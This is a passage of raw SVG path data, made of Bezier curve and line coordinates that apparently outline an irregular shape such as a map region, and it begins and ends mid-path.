727.35191,87.144265 726.23381,85.789852 C 725.15927,84.488218 725.462,84.049304 728.23381,82.89015 C 730.03021,82.138902 733.63611,81.51879 736.2469,81.512123 C 739.36962,81.504148 740.99487,81.072304 740.9969,80.25 C 740.99861,79.5625 740.4949,79 739.87756,79 C 739.13562,79 739.20757,78.45482 740.08981,77.391787 C 741.22382,76.025386 741.13831,75.574306 739.52112,74.391787 C 737.79062,73.126413 738.02362,73 742.08636,73 C 744.73362,73 747.56276,73.713282 749.02749,74.75 L 751.5,76.5 L 747.5,77.060053 L 743.5,77.620107 L 747.40916,78.451203 C 750.1532,79.034593 751.94042,78.89379 753.40558,77.978785 C 756.3456,76.142711 771.88459,71.985944 775.49297,72.070285 C 777.93928,72.127464 778.13704,72.282608 776.55355,72.902281 C 774.65762,73.644224 774.66042,73.677935 776.66152,74.201234 C 777.79145,74.496717 779.52839,74.2838 780.5214,73.728086 C 781.51441,73.172372 786.03996,72.668715 790.57819,72.608848 C 796.58661,72.529588 798.57477,72.192979 797.89233,71.370515 C 797.37688,70.749298 795.61524,69.973048 793.97757,69.645515 C 792.33991,69.317982 791,68.53629 791,67.908423 C 791,67.178089 791.99066,66.992188 793.75,67.392378 C 795.2625,67.73642 801,68.68415 806.5,69.498444 C 812,70.312739 818.68713,71.684082 821.36028,72.545874 C 824.03344,73.407666 826.43498,73.898352 826.69705,73.636287 C 827.5236,72.809732 822.13862,69.796292 821.04398,70.472821 C 820.46979,70.827688 820,70.416476 820,69.559017 C 820,68.701558 820.45,68 821,68 C 821.55,68 822,67.523442 822,66.940983 C 822,66.358524 821.625,66.113729 821.16667,66.396994 C 820.70833,66.68026 820.33333,66.246567 820.33333,65.433233 C 820.33333,64.619898 821.49583,63.666188 822.91667,63.313876 C 824.3375,62.961564 826.88195,61.171815 828.571,59.336655 C 832.61658,54.941126 834.77509,54.985898 841.83102,59.611694 C 842.01308,59.731051 841.67436,60.739938 841.07832,61.853665 C 840.34913,63.216154 840.32785,64.084589 841.01326,64.508194 C 841.57352,64.854458 841.86178,66.681767 841.65382,68.568882 C 841.44586,70.455997 841.55118,72.006891 841.88786,72.015313 C 842.22454,72.023735 843.14019,72.435806 843.92264,72.931027 C 845.05936,73.650466 844.60715,74.54825 841.67264,77.398048 C 839.65269,79.359688 838,81.287617 838,81.682334 C 838,82.07705 838.54,81.86 839.2,81.2 C 839.86,80.54 841.0975,79.985029 841.95,79.966731 C 844.3741,79.9147 847.58117,76.720702 847.57606,74.363614 C 847.57345,73.161127 847.06684,72.420856 846.41714,72.670172 C 844.6092,73.363942 843.7869,68.682795 845.49253,67.40663 C 846.72174,66.486928 846.56584,66.105606 844.51105,65.005916 C 841.55245,63.422518 841.97052,62.455897 845.95895,61.65821 C 848.21084,61.207831 848.80341,60.651273 848.33385,59.427624 C 847.86875,58.215576 848.19472,57.892117 849.60409,58.167202 C 850.75973,58.392764 851.5,59.373223 851.5,60.678268 C 851.5,61.855827 851.90965,63.197446 852.41033,63.659642 C 852.93022,64.139577 853.04977,64.024784 852.68906,63.391993 C 852.04534,62.262691 855.83158,60.094257 861.71444,58.223026 C 864.50394,57.335737 865.00859,57.451709 865.53183,59.100286 C 865.86345,60.145129 866.73131,61 867.4604,61 C 869.20354,61 870.23103,58.252238 868.69382,57.701512 C 865.77999,56.657595 869.6824,55.757765 880.17664,55.053763 C 886.40449,54.63597 890.4875,54.227959 889.25,54.14707 C 887.91022,54.059496 887,53.349328 887,52.391592 C 887,51.161392 887.60756,50.935673 889.58379,51.431674 C 891.07882,51.806903 891.92635,51.689851 891.59511,51.153891 C 891.08427,50.327337 893.50201,49.857173 906,48.352652 C 907.925,48.120918 915.90027,47.515161 923.72282,47.006524 C 932.77941,46.417648 938.77278,45.567432 940.22282,44.665848 C 945.81286,41.190133 956.25337,40.421574 959.73946,43.229166 C 960.42116,43.778188 965.92302,44.593256 971.96581,45.04043 C 985.8691,46.069289 989.67677,48.302429 983.5,51.805055 C 981.5,52.939183 981.5,52.939183 983.5,52.984904 C 985.16029,53.02286 985.24522,53.195278 984,54 C 982.12065,55.214527 981.63268,55.142527 993.43364,55.391924 C 1000.1036,55.532885 1003.4986,55.99581 1003.767,56.800929 C 1004.3405,58.521549 1019.0943,58.471399 1018.75,56.75 C 1018.581,55.9051 1019.7963,55.52985 1022.5,55.592107 C 1030.5234,55.77686 1038.0796,56.821143 1039.4155,57.929869 C 1041.2102,59.419334 1042.1219,63 1040.7064,63 C 1038.556,63 1041.4864,64.826289 1044.1719,65.159796 C 1045.8157,65.363939 1048.0509,64.599189 1049.9808,63.172287 C 1052.4218,61.367597 1053.426,61.108645 1054.5063,62.005263 C 1055.7282,63.019321 1060.4413,63.310128 1071.75,63.069231 C 1073.7895,63.025786 1074.9069,62.534429 1074.75,61.75 C 1074.6094,61.046957 1075.7033,60.361544 1077.25,60.183578 C 1078.7625,60.009545 1080,59.498864 1080,59.04873 C 1080,57.54854 1110.7193,60.319343 1112.3683,61.968262 C 1112.9357,62.535718 1114.4084,63 1115.641,63 C 1116.8735,63 1118.1348,63.409143 1118.4439,63.909207 C 1118.7529,64.409271 1124.292,64.754988 1130.7529,64.677467 C 1142.1217,64.54106 1149.7421,65.990248 1148.471,68.046958 C 1147.7651,69.189121 1149.3996,70.022104 1152.1607,69.927247 C 1153.4473,69.883044 1158.775,69.767493 1164,69.670467 C 1169.225,69.573441 1174.625,69.153416 1176,68.737077 C 1179.0222,67.821983 1182.2915,69.489183 1180.1655,70.861262 C 1179.124,71.533409 1179.2338,71.82704 1180.6655,72.198506 C 1183.0286,72.811636 1185.619,72.000611 1184.1659,71.102556 C 1183.5431,70.717604 1183.4534,69.884344 1183.9487,69.082991 C 1185.2407,66.992562 1210.1997,69.353114 1220.5402,72.543707 C 1224.9181,73.894518 1229.4124,74.999789 1230.5275,74.999864 C 1231.6426,74.999939 1233.5804,75.718248 1234.8337,76.596106 C 1236.0871,77.473964 1239.2247,78.315711 1241.8063,78.466653 C 1244.3878,78.617596 1248.1706,79.549619 1250.2124,80.537817 C 1253.5665,82.161136 1253.7595,82.460094 1252.2124,83.635467 C 1251.2706,84.350976 1249.2359,84.950705 1247.691,84.968197 C 1246.146,84.985688 1245.1038,85.358986 1245.375,85.797746 C 1245.6462,86.236506 1245.4978,87.194608 1245.0452,87.926861 C 1243.932,89.728089 1233.1082,88.445529 1232.331,86.420301 C 1231.9872,85.524199 1230.3249,85 1227.8273,85 C 1225.65,85 1222.9438,84.505104 1221.8136,83.900232 C 1220.6476,83.276197 1220.0224,83.227184 1220.3683,83.786925 C 1221.1321,85.022704 1219.3667,86.452099 1215.5625,87.678227 C 1212.6566,88.61482 1212.6458,88.645833 1214.5625,90.5625 C 1218.2292,94.229172 1217.1074,95.450259 1209.5,96.073234 C 1202.3823,96.656106 1187.7274,101.11151 1185,103.52176 C 1183.7563,104.62081 1183.1921,104.62149 1181.6985,103.52574 C 1179.7337,102.08443 1172.4083,102.55266 1170.25,104.2575 C 1169.4105,104.92066 1169,104.88662 1169,104.15383 C 1169,103.55247 1168.2623,103.34585 1167.3564,103.69349 C 1166.4524,104.04038 1164.5702,104.38523 1163.1738,104.45983 C 1161.7774,104.53442 1160.4388,105.1837 1160.1991,105.90267 C 1159.8942,106.81729 1160.3743,107.01598 1161.7975,106.56426 C 1164.7173,105.63757 1165.3866,107.50283 1162.5913,108.77644 C 1161.1003,109.45581 1159.8972,109.49716 1159.2899,108.88989 C 1158.2167,107.81669 1155,108.72931 1155,110.10699 C 1155,110.59814 1156.1801,111 1157.6224,111 C 1159.9512,111 1160.0912,111.18623 1158.8724,112.66262 C 1157.8025,113.95881 1157.7755,114.41796 1158.75,114.74595 C 1161.1109,115.54057 1160.0781,118 1157.3834,118 C 1155.1275,118 1154.8331,118.34662 1155.2476,120.51503 C 1155.6445,122.59109 1155.2721,123.12929 1153.1142,123.59855 C 1148.4459,124.61375 1147.9018,124.94881 1148.2031,126.62303 C 1148.3852,127.63475 1147.7265,128.39302 1146.5,128.58361 C 1145.4,128.75454 1143.6,129.9854 1142.5,131.31884 C 1140.1937,134.11458 1136.3185,136.35569 1135.6978,135.2527 C 1134.5847,133.2749 1131.8733,119.93047 1132.1672,117.87651 C 1132.3502,116.59697 1133.4363,115.08528 1134.5807,114.51721 C 1135.7251,113.94914 1136.4945,112.98337 1136.2904,112.37106 C 1136.0862,111.75875 1137.8996,110.75911 1140.3199,110.14966 C 1142.7403,109.5402 1145.2517,108.40163 1145.9008,107.61951 C 1147.0315,106.2571 1155.5213,101.81106 1159.3134,100.59544 C 1160.3107,100.27572 1160.8672,99.5941 1160.5499,99.080736 C 1159.927,98.072912 1155.724,99.006978 1152.0612,100.96722 C 1149.4703,102.35384 1146.5688,101.56606 1147.2952,99.6732 C 1148.1544,97.434077 1139.4455,97.550496 1136.2212,99.821235 C 1134.7245,100.87524 1132.4875,102.05197 1131.25,102.43619 C 1128.5988,103.25935 1128.3395,104.53257 1130.6431,105.41655 C 1133.4096,106.47815 1131.6404,107.00927 1123.4,107.5909 C 1118.2675,107.95317 1115.9768,107.81505 1116.861,107.19662 C 1117.8545,106.50178 1117.2305,106.12898 1114.5503,105.81608 C 1112.5309,105.58032 1110.7044,105.66932 1110.4914,106.01386 C 1110.2785,106.35839 1104.9868,106.66781 1098.732,106.70144 C 1089.9382,106.74873 1086.5821,107.16124 1083.9299,108.52083 C 1082.0434,109.48786 1080.275,110.57932 1080,110.94631 C 1079.725,111.31329 1078.0375,112.20509 1076.25,112.92809 C 1074.4625,113.65109 1073,114.62894 1073,115.10109 C 1073,115.57324 1070.6375,117.31442 1067.75,118.97039 C 1062.9969,121.69624 1062.7659,121.98212 1065.309,121.99062 C 1067.1761,121.99685 1067.8788,122.38712 1067.4045,123.15451 C 1066.9589,123.87555 1067.1306,124.03733 1067.8618,123.58541 C 1068.5058,123.18743 1068.7929,122.47399 1068.5,122 C 1067.6492,120.62345 1070.0606,119.66062 1071.2871,120.88713 C 1072.1043,121.70429 1072.0811,122 1071.2,122 C 1070.54,122 1070,122.675 1070,123.5 C 1070,125.19092 1071.5645,125.51368 1072.4914,124.01396 C 1073.2485,122.78882 1076.33,123.19907 1078.2329,124.77837 C 1079.6908,125.98828 1082.033,126.44103 1085.3724,126.15844 C 1086.9799,126.02242 1087.0552,125.77142 1085.9043,124.38466 C 1084.7394,122.98109 1084.8217,122.825 1086.5318,123.19405 C 1087.6143,123.42765 1088.3717,124.20192 1088.2149,124.91465 C 1088.0581,125.62738 1088.3746,126.74639 1088.9181,127.40135 C 1089.4617,128.0563 1089.8374,129.5082 1089.7531,130.6278 C 1089.5552,133.25489 1092.8846,142 1094.0827,142 C 1094.5872,142 1095,142.46583 1095,143.03518 C 1095,143.74876 1094.3991,143.74876 1093.0657,143.03518 C 1088.031,140.34069 1085.4583,144.02621 1088.9505,148.93048 C 1090.2337,150.73252 1090.6445,152.1017 1090.0181,152.48881 C 1089.4581,152.83488 1089,152.64148 1089,152.05902 C 1089,150.36344 1086.276,150.83832 1085.5787,152.65546 C 1084.3119,155.95678 1092.2758,161.20204 1095.4943,159.18615 C 1096.0474,158.8397 1097.1178,158.4628 1097.8728,158.34858 C 1100.1826,157.99918 1105,155.79766 1105,155.09148 C 1105,154.72525 1105.9,154.35781 1107,154.27495 C 1108.1,154.19209 1108.9884,154.43383 1108.9742,154.81215 C 1108.9501,155.45452 1103.8565,157.95188 1099.6462,159.3856 C 1098.5245,159.76759 1098.0175,160.60332 1098.3624,161.50202 C 1098.7882,162.61157 1097.9092,163.1508 1094.8869,163.63408 C 1092.6619,163.98986 1090.3457,165.07478 1089.7398,166.045 C 1088.7934,167.56042 1088.3466,167.62429 1086.5691,166.49815 C 1085.4311,165.77716 1083.15,165.21026 1081.5,165.23837 C 1079.85,165.26648 1079.0716,165.48987 1079.7702,165.73479 C 1081.3056,166.27312 1085,173.65718 1085,176.18783 C 1085,177.18452 1084.1844,178.81562 1083.1875,179.8125 C 1082.1906,180.80937 1081.5582,182.17451 1081.782,182.84612 C 1082.0059,183.51774 1081.6888,184.67008 1081.0773,185.40687 C 1080.4658,186.14367 1080.2332,187.44403 1080.5603,188.29656 C 1081.1938,189.94753 1077.6538,192.52211 1076.0841,191.55199 C 1075.6031,191.25471 1074.9132,191.78379 1074.551,192.72772 C 1073.9865,194.19872 1073.7594,194.23362 1072.9615,192.97197 C 1072.3638,192.02681 1072.0251,191.93614 1072.0153,192.71862 C 1072.0068,193.39338 1071.3249,193.67816 1070.4873,193.35674 C 1069.6553,193.03747 1068.3053,193.33169 1067.4873,194.01057 C 1066.6693,194.68945 1066,194.86466 1066,194.39994 C 1066,193.93522 1065.3054,194.54668 1064.4564,195.75875 C 1063.1271,197.65666 1062.6232,197.79163 1060.8258,196.73126 C 1059.1655,195.75177 1058.6457,195.75688 1058.2839,196.75623 C 1058.0338,197.44716 1057.3493,197.71591 1056.7629,197.35346 C 1056.1764,196.991 1055.1115,197.49464 1054.3963,198.47265 C 1053.6812,199.45066 1052.4543,200.00457 1051.6699,199.70357 C 1049.9239,199.03358 1048,200.80544 1048,203.08337 C 1048,204.82525 1045.4421,205.99145 1043.2438,205.25183 C 1042.5528,205.01937 1042.213,204.46445 1042.4885,204.01867 C 1042.764,203.57289 1042.3398,201.95609 1041.5459,200.42578 C 1040.0948,197.62875 1040.3637,195.48871 1042.0364,196.52249 C 1042.5304,196.8278 1043.5076,196.16014 1044.2078,195.0388 C 1044.9081,193.91746 1045.8659,193 1046.3362,193 C 1046.8065,193 1048.4407,192.1103 1049.9679,191.02289 C 1051.7023,189.78787 1054.5995,188.98012 1057.6868,188.87085 C 1062.1035,188.71453 1062.8625,188.33986 1064.8237,185.34796 C 1066.0308,183.50658 1067.4908,182 1068.0682,182 C 1068.6456,182 1068.7927,182.52647 1068.395,183.16994 C 1067.902,183.96759 1068.2275,184.12669 1069.4177,183.66994 C 1070.378,183.30147 1071.3376,183 1071.5504,183 C 1071.7632,183 1071.6957,182.37052 1071.4004,181.60115 C 1071.1052,180.83178 1071.3443,179.90523 1071.9318,179.54213 C 1072.5193,179.17904 1073,179.42827 1073,180.09597 C 1073,180.85389 1073.743,180.6376 1074.9776,179.52023 C 1076.0654,178.53587 1076.9243,176.77863 1076.8864,175.61524 C 1076.8485,174.45186 1077.05,172.04335 1077.3343,170.263 C 1077.6185,168.48264 1077.4346,166.76859 1076.9255,166.45398 C 1075.4535,165.5442 1075.8521,164 1077.559,164 C 1078.4165,164 1078.8399,163.55 1078.5,163 C 1078.1601,162.45 1078.7782,162 1079.8736,162 C 1080.969,162 1082.1073,161.2125 1082.4032,160.25 C 1083.9515,155.21384 1085.0374,135.67849 1083.8737,133.79566 C 1082.8916,132.20657 1079.8545,134.72211 1080.122,136.90309 C 1080.6057,140.84647 1078.1469,144.76473 1070.1207,152.84083 C 1060.648,162.37234 1055.0888,165.61769 1050.108,164.52372 C 1048.1555,164.09487 1047,164.23532 1047,164.90149 C 1047,165.48471 1045.875,166.24425 1044.5,166.58936 C 1042.7642,167.025 1042,167.90149 1042,169.45653 C 1042,171.10225 1040.9391,172.17463 1038,173.5 C 1035.8,174.49206 1034,175.43536 1034,175.59622 C 1034,175.75708 1035.5729,177.60124 1037.4952,179.69435 C 1040.5928,183.06702 1041.7799,186.41012 1040.977,189.5 C 1040.8341,190.05 1040.7529,191.2875 1040.7964,192.25 C 1040.84,193.2125 1040.4271,194 1039.8788,194 C 1039.3306,194 1039.1827,193.51338 1039.5503,192.91862 C 1040.2663,191.76017 1035.9026,191.97912 1035,193.14694 C 1034.725,193.50276 1033.375,193.95276 1032,194.14694 C 1029.7423,194.46579 1029.5,194.16082 1029.5,191 C 1029.5,189.075 1029.1552,186.96859 1028.7337,186.3191 C 1028.3122,185.6696 1028.4247,184.85554 1028.9837,184.51008 C 1030.726,183.43324 1030.0954,181.74178 1028.142,182.25261 C 1027.1202,182.51983 1025.518,182.30977 1024.5817,181.78579 C 1023.0329,180.91904 1023.0178,180.62176 1024.4143,178.49043 C 1025.8908,176.23699 1025.8368,176.12306 1022.9944,175.49878 C 1020.8775,175.03381 1018.9029,175.48863 1016.031,177.10275 C 1011.3085,179.75691 1009.8953,178.9899 1012.1785,175.01179 C 1013.0809,173.43928 1013.5856,171.91893 1013.2999,171.63323 C 1012.6692,171.00256 1005.9121,174.52412 1005.0375,175.93932 C 1004.6941,176.49491 1003.3315,177.11457 1002.0094,177.31634 C 998.57811,177.83999 998.36028,179.79595 1001.6907,180.17786 C 1003.646,180.40208 1004.4578,181.03196 1004.3611,182.25 C 1004.1902,184.40306 1004.9168,184.44699 1007.7601,182.4555 C 1009.3048,181.37356 1010.4945,181.19428 1011.7326,181.85688 C 1013.5462,182.82752 1014.2027,183 1016.0833,183 C 1018.1243,183 1016.3969,185.31643 1014.0939,185.6679 C 1011.5077,186.06259 1006.1401,189.96316 1006.0553,191.50945 C 1006.0249,192.06465 1006.9,193.08097 1008,193.76793 C 1009.1,194.45489 1010,195.7285 1010,196.59818 C 1010,197.46786 1010.9785,198.97179 1012.1745,199.94024 C 1014.7262,202.00643 1015.2935,205.67338 1013.1867,206.48186 C 1011.7122,207.04766 1012.3575,208.5 1014.0833,208.5 C 1015.3286,208.5 1015.3822,208.98319 1014.5549,212.75 C 1014.1623,214.5375 1013.2385,216 1012.5021,216 C 1011.0325,216 1006.6667,222.46236 1006.6667,224.63771 C 1006.6667,225.38697 1006.3996,226 1006.0731,226 C 1005.7467,226 1004.3592,227.02735 1002.9898,228.283 C 998.38973,232.501 991.41225,235.9412 986.5,236.41318 C 985.95,236.46603 984.6,237.01045 983.5,237.62301 C 982.4,238.23557 979.8125,239.04137 977.75,239.41369 C 973.63931,240.15574 973.54419,240.2798 975.00014,243.00027 C 977.15258,247.02214 972.8197,252.01925 968.58801,250.3954 C 966.32654,249.52759 966.93076,245.83489 969.54855,244.52503 C 970.95363,243.82197 971.42479,242.87178 971.04855,241.5 C 970.5436,239.65898 969.48417,239.35959 965.21667,239.85194 C 964.51083,239.93337 962.32562,241.60771 960.36064,243.57269 L 956.78795,247.14538 L 958.90312,249.39688 C 960.06647,250.6352 960.83039,251.83999 960.60072,252.07419 C 960.37106,252.30838 961.70456,253.625 963.56405,255 C 965.42354,256.375 966.95733,258.025 966.97247,258.66667 C 966.98761,259.30833 967.50716,260.00239 968.12702,260.20901 C 968.74688,260.41563 969.60392,262.81563 970.03156,265.54234 C 970.94317,271.35505 969.74755,274.61656 965.85735,276.92908 C 964.4039,277.79309 961.11884,279.9625 958.55722,281.75 C 955.9956,283.5375 953.77523,285 953.62306,285 C 953.47089,285 953.55506,283.57821 953.81011,281.84047 C 954.18187,279.30751 953.97032,278.79741 952.74337,279.26824 C 951.18638,279.86571 947,276.27388 947,274.34054 C 947,272.69747 943.65621,270.2236 941.84004,270.52298 C 940.87733,270.68167 939.87891,269.89423 939.46309,268.6483 C 938.76961,266.57043 938.73073,266.58196 938.27723,269 C 938.01935,270.375 937.42122,271.97233 936.94804,272.54961 C 935.59965,274.19469 934.5013,282.42625 935.73165,281.66585 C 936.66223,281.09072 937.62998,282.84479 939.3992,288.31338 C 939.72187,289.31074 940.36624,289.89169 940.83113,289.60437 C 941.29602,289.31705 943.5492,290.82834 945.83819,292.96279 C 949.31747,296.20717 950.00061,297.47143 950.00374,300.67181 C 950.00579,302.77731 950.93004,306.01325 952.05763,307.86278 C 953.18521,309.71231 953.83406,311.49928 953.49951,311.83382 C 953.16497,312.16836 952.57822,312.00511 952.19563,311.47104 C 951.39822,310.35792 945.56938,307 944.43458,307 C 944.01833,307 945.33481,308.41543 947.36012,310.1454 C 949.98105,312.38414 950.87281,313.82538 950.45385,315.1454 C 950.13011,316.16543 950.34555,317 950.93261,317 C 951.51968,317 952,316.325 952,315.5 C 952,314.675 952.675,314 953.5,314 C 955.27053,314 955.44052,315.15948 953.89638,316.70362 C 953.16013,317.43987 953.11407,318.38141 953.75799,319.53204 C 954.41077,320.69848 954.949,320.89154 955.42063,320.12842 C 956.40679,318.53279 959,318.72448 959,320.39301 C 959,321.15917 959.66741,322.04213 960.48314,322.35516 C 962.16336,322.99992 961.43136,326.05652 959.67772,325.71838 C 958.97387,325.58267 958.5366,327.18408 958.52257,329.94883 C 958.50032,334.33507 958.55602,334.40938 962.48273,335.23155 C 964.67323,335.6902 966.90073,336.50073 967.43273,337.03273 C 968.71008,338.31008 973.71174,338.27542 974.51008,336.98369 C 974.85554,336.42472 975.6696,336.3042 976.3191,336.71587 C 976.96859,337.12755 979.75,337.7297 982.5,338.054 C 987.17822,338.60568 987.33911,338.71537 985,339.75842 L 982.5,340.87323 L 985.08333,340.93661 C 986.50417,340.97148 987.96489,341.29823 988.32939,341.66272 C 989.04796,342.38129 994.57495,343.26818 997,343.05405 C 1001.2897,342.67527 1003.3048,342.90483 1004.2838,343.8838 C 1005.9463,345.5463 1004.7564,346.0477 998.88834,346.15732 C 992.7448,346.27208 990.80885,345.92039 989.76531,344.5 C 989.32135,343.89571 989.02457,344.03697 989.01531,344.85699 C 989.00509,345.76307 988.4185,345.96809 987.25,345.474 C 986.2875,345.067 983.25,344.57305 980.5,344.37633 C 977.75,344.1796 974.375,343.59604 973,343.07952 C 971.625,342.56301 967.9125,341.85143 964.75,341.49824 C 961.5875,341.14506 959,340.43847 959,339.92804 C 959,339.41762 958.0449,339 956.87756,339 C 955.05871,339 954.94223,338.77454 956.06325,337.42378 C 957.14616,336.11897 957.12874,335.6976 955.96209,334.97657 C 955.14279,334.47021 954.31215,334.49492 953.978,335.0356 C 953.00724,336.60632 941.39089,324.81393 938.48533,319.30815 C 936.97839,316.45263 935.12771,313.87925 934.37272,313.58953 C 933.61772,313.29981 933,312.34632 933,311.47066 C 933,310.59501 930.075,307.02467 926.5,303.53659 C 920.23537,297.42426 918.41885,294 921.44098,294 C 922.23352,294 923.11447,294.3762 923.39864,294.836 C 923.68281,295.2958 924.88558,295.60052 926.07145,295.51315 C 927.45913,295.41092 930.12298,297.21965 933.54577,300.58818 C 938.78397,305.74332 943,308.18673 943,306.06739 C 943,305.48032 942.65985,305 942.24411,305 C 941.30607,305 939.47378,300.79513 938.0857,295.45703 C 936.95019,291.09018 933.46299,286.59582 931.94039,287.53684 C 930.89778,288.18121 930.68301,286.47201 931.05613,280.5 C 931.56608,272.33809 931.50295,267.81084 930.87377,267.42199 C 930.5179,267.20204 929.91077,265.3379 929.5246,263.27945 C 929.13844,261.22101 928.38576,258.72081 927.852,257.72346 C 926.92212,255.98597 926.7459,255.99392 923.63993,257.91352 C 921.68533,259.12153 919.52522,259.6886 918.19917,259.34183 C 916.98963,259.02553 916,258.70375 916,258.62677 C 916,258.54978 916.42559,257.00286 916.94575,255.18915 C 917.72999,252.45468 917.55921,251.55921 915.94575,249.94575 C 914.87559,248.87559 914,247.51538 914,246.92308 C 914,246.33077 912.65,244.49615 911,242.84615 C 909.35,241.19615 908,239.00733 908,237.98209 C 908,235.80496 906.35071,234.44787 905.7812,236.1564 C 905.39276,237.32173 904.18364,237.73304 898.5,238.63326 C 892.71073,239.55021 891.01271,240.04157 891.12428,240.76758 C 891.48543,243.11755 890.63097,244.25624 887.53607,245.54938 C 885.6309,246.34541 883.63604,247.78494 883.10303,248.74835 C 882.57002,249.71176 880.75508,251.4 879.06984,252.5 C 877.38459,253.6 876.00446,255.0625 876.00288,255.75 C 876.00129,256.4375 875.3801,257 874.62244,257 C 873.86479,257 872.66769,257.69548 871.96223,258.54551 C 871.25677,259.39554 870.0511,259.84985 869.28296,259.55509 C 868.18684,259.13447 867.91697,260.14669 868.0287,264.25958 C 868.107,267.14181 867.84526,271.43533 867.44705,273.80074 C 866.82376,277.50322 867.05531,278.47698 869.11152,280.80074 C 871.83977,283.88398 874,287.50126 874,288.98643 C 874,290.51408 870.20266,294 868.53854,294 C 866.52996,294 864.70268,286.91221 865.89963,283.76398 C 866.44758,282.32278 866.45882,280.75633 865.92725,279.91653 C 865.11671,278.636 864.57743,279.32371 864.88158,281.25 C 864.94671,281.6625 864.1,282 863,282 C 861.70435,282 861,282.66667 861,283.89301 C 861,288.30844 854.99802,285.93358 853.54743,280.94418 C 853.15659,279.59988 851.8093,276.25 850.55346,273.5 C 843.46559,257.97928 840.54455,249.02875 841.03703,244.34011 C 841.40744,240.81366 840.99728,238.45613 840.22467,239.67072 C 838.53899,242.3207 834.41279,242.21822 831.11639,239.44449 C 829.35624,237.96342 828.08347,236.24959 828.28801,235.63597 C 828.69281,234.42156 824.85813,231 823.09227,231 C 822.49152,231 822,230.51786 822,229.92857 C 822,226.8292 819.09066,225.94843 810.29563,226.38517 C 805.45803,226.6254 798.35391,226.29951 794.50869,225.66097 C 788.39262,224.64534 787.35215,224.154 786.1975,221.73616 C 784.98754,219.20252 784.70799,219.09112 782.84123,220.39865 C 780.64637,221.936 773.74183,221.62523 773.16667,219.96321 C 772.98333,219.43345 772.19583,219 771.41667,219 C 770.6375,219 770,218.55 770,218 C 770,217.45 769.08588,217 767.96862,217 C 766.85135,217 765.64976,216.2125 765.2984,215.25 C 764.21456,212.28095 761.57479,209.45514 760,209.57818 C 755.87642,209.90035 755.77975,209.98633 756.46623,212.72147 C 756.8419,214.21827 758.69069,216.93994 760.57464,218.76961 C 762.45859,220.59927 764,222.57971 764,223.17058 C 764,223.86051 764.53669,223.79948 765.5,223 C 766.325,222.31531 767.06793,222.14771 767.15095,222.62756 C 767.28734,223.41583 767.52177,225.38146 767.87364,228.68713 C 768.13109,231.10581 775.39487,228.83205 780.25,224.81298 L 785,220.88095 L 785,224.90529 C 785,229.05039 786.78163,231 790.56959,231 C 791.50518,231 793.33693,232.15053 794.64015,233.55673 C 796.5317,235.59774 796.79987,236.50543 795.96964,238.05673 C 795.39764,239.12553 794.47574,240 793.92098,240 C 793.36622,240 793.04455,240.7875 793.20616,241.75 C 793.40378,242.92694 792.84507,243.50602 791.5,243.51837 C 790.07883,243.53143 789.52298,244.18262 789.5794,245.76837 C 789.62343,247.0058 789.06219,248 788.31961,248 C 787.58306,248 786.20982,248.9 785.26797,250 C 784.32612,251.1 783.02867,252 782.38475,252 C 781.74082,252 780.95496,252.675 780.63837,253.5 C 780.32179,254.325 778.94482,255 777.57844,255 C 774.42693,255 770.00612,256.9843 769.9802,258.41052 C 769.95729,259.67073 758.60319,265.05927 752,266.94373 C 749.525,267.65006 746.59204,268.64677 745.48231,269.15863 C 744.37259,269.6705 742.48808,270.16286 741.29452,270.25277 C 738.44961,270.46707 737.73595,273.45106 740.03254,275.52945 C 741.71911,277.05577 742.54636,277.02865 751.67406,275.14782 C 757.07833,274.03423 762.625,272.84088 764,272.49594 C 766.30301,271.91819 766.50575,272.14576 766.57292,275.38397 C 766.61303,277.31732 766.27553,278.67029 765.82292,278.39056 C 765.37032,278.11083 764.9926,278.69602 764.98355,279.69098 C 764.9745,280.68594 763.87222,283.3 762.53403,285.5 C 761.19584,287.7 758.99816,291.53391 757.65029,294.0198 C 755.32126,298.31525 748.42606,305.31414 742.53283,309.3646 C 741.04073,310.39013 737.76323,313.87763 735.2495,317.1146 C 732.73576,320.35157 730.17494,323 729.55877,323 C 728.94261,323 727.89167,324.2375 727.22335,325.75 C 726.55503,327.2625 725.31516,329.99908 724.46807,331.83129 C 723.62099,333.6635 723.39414,334.87444 723.96396,334.52227 C 724.53378,334.1701 725,333.23352 725,332.44098 C 725,331.64844 725.47656,331 726.05902,331 C 726.64148,331 726.7785,331.54939 726.3635,332.22086 C 725.24645,334.02828 724.99618,342.1204 726.078,341.45179 C 726.5851,341.13839 727,341.35852 727,341.94098 C 727,342.52344 726.54143,343 725.98095,343 C 724.65174,343 725.84244,348.17691 727.47733,349.50596 C 728.20166,350.0948 728.9204,354.03401 729.21067,359.00596 C 729.83066,369.62541 727.65531,373.95597 720.92889,375.49287 C 719.51477,375.81597 716.98735,377.29976 715.3124,378.79017 C 713.63745,380.28057 711.43713,381.98789 710.4228,382.5842 C 708.6853,383.60567 708.66631,383.98361 710.09473,389.11559 C 712.23538,396.8065 711.17009,400.237 706.01193,402.26318 C 702.86161,403.50066 702,404.36124 702,406.27033 C 702,410.09613 699.96835,414.94657 697.90287,416.05198 C 696.86514,416.60736 695.22498,418.54474 694.25805,420.35729 C 690.03589,428.2719 678.33389,434.92185 669.5,434.42665 C 667.3,434.30333 663.28082,434.83188 660.5685,435.60121 C 657.85617,436.37055 655.60617,436.95213 655.5685,436.89362 C 655.53082,436.83511 654.36113,436.33293 652.96917,435.77766 z M 736.76168,263.3649 C 735.987,261.78921 735.53988,259.67002 735.76809,258.6556 C 736.00415,257.60624 734.85039,255.15294 733.0915,252.96424 C 731.39118,250.84841 730,248.73464 730,248.26698 C 730,247.79931 728.425,245.74688 726.5,243.70602 C 724.575,241.66516 722.94809,239.4339 722.88465,238.74768 C 722.43026,233.83282 720.86575,230.19816 718.99387,229.70865 C 717.98367,229.44447 716.17917,227.31137 714.98388,224.96841 C 712.14822,219.41005 708.47377,215.4244 707.55524,216.91062 C 707.17385,217.52772 706.39469,217.74393 705.82377,217.39108 C 705.1465,216.97251 705.04134,217.57506 705.52118,219.12477 C 706.60777,222.63409 709.82762,228.77543 710.94204,229.46418 C 711.47587,229.79411 711.6724,230.69013 711.37877,231.45533 C 711.07836,232.23818 711.77437,233.34406 712.97031,233.98411 C 715.58242,235.38207 717.34867,239.48739 717.08239,243.5419 C 716.94809,245.58686 717.5998,247.22554 719.0709,248.5419 C 720.27445,249.61885 722.08193,252.40564 723.08752,254.73476 C 724.33414,257.62216 725.37431,258.79359 726.35678,258.41659 C 727.14928,258.11247 728.09477,258.34433 728.45787,258.93183 C 728.82096,259.51932 728.52898,260.01368 727.80902,260.03041 C 726.99237,260.04938 727.15113,260.44023 728.23111,261.06953 C 